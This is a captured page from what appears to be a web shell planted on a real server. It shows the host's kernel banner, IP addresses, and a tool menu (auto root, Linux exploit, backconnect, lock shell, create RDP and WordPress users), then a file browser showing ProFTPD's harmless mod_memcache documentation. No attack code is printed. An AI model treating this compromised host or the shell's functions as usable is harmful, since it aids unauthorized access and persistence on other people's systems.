Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.186
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
proftpd /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
4.66
KB
-rw-r--r--
mod_auth.html
39.51
KB
-rw-r--r--
mod_auth_file.html
9.21
KB
-rw-r--r--
mod_auth_pam.html
5.79
KB
-rw-r--r--
mod_auth_unix.html
10.76
KB
-rw-r--r--
mod_cap.html
8.1
KB
-rw-r--r--
mod_core.html
126.18
KB
-rw-r--r--
mod_ctrls.html
11.58
KB
-rw-r--r--
mod_delay.html
11.43
KB
-rw-r--r--
mod_dso.html
16.33
KB
-rw-r--r--
mod_facl.html
2.22
KB
-rw-r--r--
mod_facts.html
10.83
KB
-rw-r--r--
mod_ident.html
2.78
KB
-rw-r--r--
mod_lang.html
11.19
KB
-rw-r--r--
mod_log.html
20.14
KB
-rw-r--r--
mod_ls.html
8.95
KB
-rw-r--r--
mod_memcache.html
5.05
KB
-rw-r--r--
mod_redis.html
13.45
KB
-rw-r--r--
mod_rlimit.html
9.55
KB
-rw-r--r--
mod_site.html
905
B
-rw-r--r--
mod_xfer.html
24.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_memcache.html
<!DOCTYPE html> <html> <head> <title>ProFTPD module mod_memcache</title> </head> <body bgcolor=white> <hr> <center> <h2><b>ProFTPD module <code>mod_memcache</code></b></h2> </center> <hr><br> <p> The <code>mod_memcache</code> module enables ProFTPD support for caching data in <a href="http://memcached.org">memcached</a> servers, using the <a href="http://libmemcached.org">libmemcached</a> client library. Note that <code>libmemcached</code> version 0.41 or later is <b>required</b>. <h2>Directives</h2> <ul> <li><a href="#MemcacheEngine">MemcacheEngine</a> <li><a href="#MemcacheLog">MemcacheLog</a> <li><a href="#MemcacheOptions">MemcacheOptions</a> <li><a href="#MemcacheReplicas">MemcacheReplicas</a> <li><a href="#MemcacheServers">MemcacheServers</a> <li><a href="#MemcacheTimeouts">MemcacheTimeouts</a> </ul> <hr> <h3><a name="MemcacheEngine">MemcacheEngine</a></h3> <strong>Syntax:</strong> MemcacheEngine <em>on|off</em><br> <strong>Default:</strong> MemcacheEngine off<br> <strong>Context:</strong> server config, <code><VirtualHost></code>, <code><Global></code><br> <strong>Module:</strong> mod_memcache<br> <strong>Compatibility:</strong> 1.3.4rc2 and later <p> The <code>MemcacheEngine</code> directive enables or disables the <code>mod_memcache</code> module, and thus the configuration of memcache support for the <code>proftpd</code> daemon. <p> <hr> <h3><a name="MemcacheLog">MemcacheLog</a></h3> <strong>Syntax:</strong> MemcacheLog <em>path|"none"</em><br> <strong>Default:</strong> None<br> <strong>Context:</strong> server config, <code><VirtualHost></code>, <code><Global></code><br> <strong>Module:</strong> mod_memcache<br> <strong>Compatibility:</strong> 1.3.4rc2 and later <p> The <code>MemcacheLog</code> directive is used to specify a log file for <code>mod_memcache</code>'s reporting on a per-server basis. The <em>file</em> parameter given must be the full path to the file to use for logging. <p> Note that this path must <b>not</b> be to a world-writable directory and, unless <code>AllowLogSymlinks</code> is explicitly set to <em>on</em> (generally a bad idea), the path must <b>not</b> be a symbolic link. <p> <hr> <h3><a name="MemcacheOptions">MemcacheOptions</a></h3> <strong>Syntax:</strong> MemcacheOptions <em>opt1 ... optN</em><br> <strong>Default:</strong> None<br> <strong>Context:</strong> server config, <code><VirtualHost></code>, <code><Global></code><br> <strong>Module:</strong> mod_memcache<br> <strong>Compatibility:</strong> 1.3.4rc2 and later <p> The currently supported <code>MemcacheOptions</code> are: <ul> <li><code>NoBinaryProtocol</code> </ul> <p> <hr> <h3><a name="MemcacheReplicas">MemcacheReplicas</a></h3> <strong>Syntax:</strong> MemcacheReplicas <em>count</em><br> <strong>Default:</strong> None<br> <strong>Context:</strong> server config, <code><VirtualHost></code>, <code><Global></code><br> <strong>Module:</strong> mod_memcache<br> <strong>Compatibility:</strong> 1.3.4rc2 and later <p> <em>Experimental feature</em> <p> <hr> <h3><a name="MemcacheServers">MemcacheServers</a></h3> <strong>Syntax:</strong> MemcacheServers <em>servers</em><br> <strong>Default:</strong> None<br> <strong>Context:</strong> server config, <code><VirtualHost></code>, <code><Global></code><br> <strong>Module:</strong> mod_memcache<br> <strong>Compatibility:</strong> 1.3.4rc2 and later <p> The <code>MemcacheServers</code> directive is used to configure the IP addresses/ports of the <code>memcached</code> servers that the <code>mod_memcache</code> module is to use. The list of servers is expressed as a space-delimited list. For example: <pre> MemcacheServers 1.2.3.4:11211 1.2.3.5:22422 </pre> <p> Alternatively, you can configure a Unix domain socket path using <i>e.g.</i>: <pre> MemcacheServers /var/run/memcached.sock </pre> <p> <hr> <h3><a name="MemcacheTimeouts">MemcacheTimeouts</a></h3> <strong>Syntax:</strong> MemcacheTimeouts <em>connect read write</em><br> <strong>Default:</strong> None<br> <strong>Context:</strong> server config, <code><VirtualHost></code>, <code><Global></code><br> <strong>Module:</strong> mod_memcache<br> <strong>Compatibility:</strong> 1.3.4rc2 and later <p> <em>Experimental feature</em> <p> <hr> <h2><a name="Installation">Installation</a></h2> The <code>mod_memcache</code> module is distributed with ProFTPD. To enable support and use of the memcache protocol in your <code>proftpd</code> daemon, use the <code>--enable-memcache</code> configure option: <pre> $ ./configure --enable-memcache ... $ make $ make install </pre> This option causes the <code>mod_memcache</code> module to be compiled into <code>proftpd</code>. <p> You may also need to tell <code>configure</code> how to find the <code>libmemcached</code> header and library files: <pre> $ ./configure --enable-memcache \ --with-includes=<i>/path/to/libmemcached/include</i> \ --with-libraries=<i>/path/to/libmemcached/lib</i> </pre> <p> <hr> <font size=2><b><i> © Copyright 2011-2013 The ProFTPD Project<br> All Rights Reserved<br> </i></b></font> <hr> </body> </html>
Close